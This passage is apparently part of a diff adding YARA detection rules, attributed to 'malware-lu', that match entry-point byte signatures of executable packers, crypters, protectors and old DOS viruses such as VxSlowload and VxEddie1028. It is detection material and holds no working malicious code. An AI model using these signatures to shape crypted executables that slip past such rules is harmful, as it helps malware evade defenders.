+condition:
+		$a0
+}
+	
+	
+rule VxSlowload
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 03 D6 B4 40 CD 21 B8 02 42 33 D2 33 C9 CD 21 8B D6 B9 78 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote10BetaSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 BB FF FF FF 84 C0 74 2F 68 04 01 00 00 68 C0 23 60 00 6A 00 FF 15 08 10 60 00 E8 40 FF FF FF 50 68 78 11 60 00 68 68 11 60 00 68 C0 23 60 00 E8 AB FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0 66 8B 41 06 89 54 24 14 8D 68 FF 85 ED 7C 37 33 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DzAPatcherv13Loader
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 00 40 40 00 99 68 48 20 40 00 68 00 20 40 00 52 52 52 52 52 52 52 57 E8 15 01 00 00 85 C0 75 1C 99 52 52 57 52 E8 CB 00 00 00 FF 35 4C 20 40 00 E8 D2 00 00 00 6A 00 E8 BF 00 00 00 99 68 58 20 40 00 52 52 68 63 10 40 00 52 52 E8 DB 00 00 00 6A FF FF 35 }
+
+condition:
+		$a0
+}
+	
+	
+rule CDSSS10beta1CyberDoom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8 4E 40 00 E8 D7 03 00 00 0B C0 0F 84 A9 02 00 00 E8 F9 02 00 00 89 85 94 4E 40 00 8D 85 12 4D 40 00 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule y0dasCrypterv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED E7 1A 40 00 E8 A1 00 00 00 E8 D1 00 00 00 E8 85 01 00 00 F7 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule y0dasCrypterv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NullsoftPiMPInstallSystemv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 0C 53 56 57 FF 15 ?? ?? 40 00 05 E8 03 00 00 BE ?? ?? ?? 00 89 44 24 10 B3 20 FF 15 28 ?? 40 00 68 00 04 00 00 FF 15 ?? ?? 40 00 50 56 FF 15 ?? ?? 40 00 80 3D ?? ?? ?? 00 22 75 08 80 C3 02 BE ?? ?? ?? 00 8A 06 8B 3D ?? ?? 40 00 84 C0 74 ?? 3A C3 74 }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeBundlev30smallloader
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 60 BE 00 F0 40 00 8D BE 00 20 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXAlternativestub
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPE113cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 B8 5E 2D C6 DA FD 48 63 05 3C 71 B8 5E 97 7C 36 7E 32 7C 08 4F 06 51 64 10 A3 F1 4E CF 25 CB 80 D2 99 54 46 ED E1 D3 46 86 2D 10 68 93 83 5C 46 4D 43 9B 8C D6 7C BB 99 69 97 71 2A 2F A3 38 6B 33 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2223protectedIAT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { CC ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? B4 ?? ?? ?? 08 ?? ?? ?? 00 00 00 00 FF FF FF FF E8 ?? ?? ?? 04 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 94 ?? ?? ?? A4 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01Armadillo300Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2A 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 85 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorvxxxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Morphinev33SilentSoftwareSilentShieldc2005
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 }
+	$a1 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule DEF10bartxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv0971v0976
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 C3 9C 60 E8 5D 55 5B 81 ED 8B 85 01 85 66 C7 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PCShrinkv040b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 BD ?? ?? ?? ?? 01 ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 6A ?? FF ?? ?? ?? ?? ?? 50 50 2D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePECrypt102emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5B 83 EB 05 EB 04 52 4E 44 21 85 C0 73 02 F7 05 50 E8 08 00 00 00 EA FF 58 EB 18 EB 01 0F EB 02 CD 20 EB 03 EA CD 20 58 58 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ORiENv211212FisunAlexander
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5D 01 00 00 CE D1 CE ?? 0D 0A 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 0D 0A 2D 20 4F 52 69 45 4E 20 65 78 65 63 75 74 61 62 6C 65 20 66 69 6C 65 73 20 70 72 6F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StonesPEEncruptorv113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv11MTEc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 E8 1B ?? ?? ?? E9 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CreateInstallStubvxx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 20 02 00 00 53 56 57 6A 00 FF 15 18 61 40 00 68 00 70 40 00 89 45 08 FF 15 14 61 40 00 85 C0 74 27 6A 00 A1 00 20 40 00 50 FF 15 3C 61 40 00 8B F0 6A 06 56 FF 15 38 61 40 00 6A 03 56 FF 15 38 61 40 00 E9 36 03 00 00 68 02 7F 00 00 33 F6 56 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinZip32bitSFXv8xmodule
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 FF 15 ?? ?? ?? 00 B3 22 38 18 74 03 80 C3 FE 8A 48 01 40 33 D2 3A CA 74 0A 3A CB 74 06 8A 48 01 40 EB F2 38 10 74 01 40 ?? ?? ?? ?? FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upxv12MarcusLazlo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPACKv10byANAKiN1998
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 ?? E9 ?? ?? ?? ?? 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NeoLitev20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4E 65 6F 4C 69 74 65 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeSpalsher1x3xFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 9C 60 8B 44 24 24 E8 00 00 00 00 5D 81 ED 00 00 00 00 50 E8 ED 02 00 00 8C C0 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv10803AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }
+	$a1 = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E }
+	$a2 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD }
+	$a3 = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point
+}
+	
+	
+rule VMProtect07x08PolyTech
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeShieldProtectorV36wwwexeshieldcom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WerusCrypter10Kas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 98 11 40 00 6A 00 E8 50 00 00 00 C9 C3 ED B3 FE FF FF 6A 00 E8 0C 00 00 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 A8 10 40 00 FF 25 B0 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BB E8 12 40 00 80 33 05 E9 7D FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule Themida10xx1800compressedengineOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }
+	$a1 = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 5A ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 5A ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 AF 01 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule CHECKPRGc1992
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressor11CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? 12 00 00 E9 ?? 0C 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie1028
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E FC 83 ?? ?? 81 ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E B8 FE 4B CD 21 81 FF BB 55 ?? ?? 07 ?? ?? ?? 07 B4 49 CD 21 BB FF FF B4 48 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEQuakev006byfORGAT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 A5 00 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 3D ?? 00 00 2D ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4A ?? 00 00 5B ?? 00 00 6E ?? 00 00 00 00 00 00 6B 45 72 4E 65 4C 33 32 2E 64 4C 6C 00 00 00 47 65 74 50 72 6F 63 41 64 }
+
+condition:
+		$a0
+}
+	
+	
+rule LTCv13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv071b7
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 48 11 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv071b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 44 11 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnknownJoinersignfrompinch260320070212
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 44 90 4C 90 B9 DE 00 00 00 BA 00 10 40 00 83 C2 03 44 90 4C B9 07 00 00 00 44 90 4C 33 C9 C7 05 08 30 40 00 00 00 00 00 90 68 00 01 00 00 68 21 30 40 00 6A 00 E8 C5 02 00 00 90 6A 00 68 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DIETv100v100d
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule APEX_CBLTApex40500mhz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 ?? ?? ?? ?? B9 FF FF FF 00 01 D0 F7 E2 72 01 48 E2 F7 B9 FF 00 00 00 8B 34 24 80 36 FD 46 E2 FA C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule StealthPEv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? ?? 00 FF E2 BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 03 B8 ?? ?? ?? ?? 89 02 83 C2 FD FF E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117DLLAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Anti007V26LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 57 72 69 74 65 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule AppEncryptorSilentTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 1F 1F 40 00 B9 7B 09 00 00 8D BD 67 1F 40 00 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VirogenCryptv075
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 55 E8 EC 00 00 00 87 D5 5D 60 87 D5 80 BD 15 27 40 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov300a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv300v301Extractable
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 6A ?? 06 06 8C D3 83 ?? ?? 53 6A ?? FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxUddy2617
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? 8C C8 8E D8 8C ?? ?? ?? 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? 8C C8 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? B8 AB 9C CD 2F 3D 76 98 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PLINK8619841985
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 8C C7 8C D6 8B CC BA ?? ?? 8E C2 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv10804AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 41 06 00 00 EB 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule aPackv098m
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C C8 8E D8 05 ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B2 ?? BD ?? ?? 33 C9 50 A4 BB ?? ?? 3B F3 76 }
+
+condition:
+		$a0
+}
+	
+	
+rule BamBamv001Bedrock
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 14 E8 9A 05 00 00 8B D8 53 68 FB ?? ?? 00 E8 6C FD FF FF B9 05 00 00 00 8B F3 BF FB ?? ?? 00 53 F3 A5 E8 8D 05 00 00 8B 3D 03 ?? ?? 00 A1 2B ?? ?? 00 66 8B 15 2F ?? ?? 00 B9 80 ?? ?? 00 2B CF 89 45 E8 89 0D 6B ?? ?? 00 66 89 55 EC 8B 41 3C 33 D2 03 C1 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESHiELDv02v02bv02b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv27
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED D3 26 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealthv25
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 EB 22 45 78 65 53 74 65 61 6C 74 68 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D E8 00 00 00 00 5D 81 ED 40 1E 40 00 B9 99 09 00 00 8D BD 88 1E 40 00 8B F7 AC }
+
+condition:
+		$a0
+}
+	
+	
+rule VxHaryanto
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 EB 2A 01 8B 0F 1E 5B 03 CB 0E 51 B9 10 01 51 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPRStripperv2xunpacked
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 9C FC BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AA 9D 61 C3 55 8B EC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01UPX06Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinker33
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8 }
+
+condition:
+		$a0
+}
+	
+	
+rule Shrinker32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 57 75 65 68 00 01 00 00 E8 F1 E6 FF FF 83 C4 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule Shrinker34
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 11 0B 00 00 83 C4 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule PESPinv13Cyberbob
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv160v165
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 80 40 ?? 87 DD 8B 85 D2 80 40 ?? 01 85 33 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 CE 80 40 ?? BB BB 12 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorv120b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? 00 2B 05 84 ?? ?? 00 A3 ?? ?? ?? 00 83 3D ?? ?? ?? 00 00 74 16 A1 ?? ?? ?? 00 03 05 80 ?? ?? 00 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? 00 01 00 00 00 68 04 }
+
+condition:
+		$a0
+}
+	
+	
+rule EPWv12
+{
+      meta:
+		author="malware-lu"
+strings:
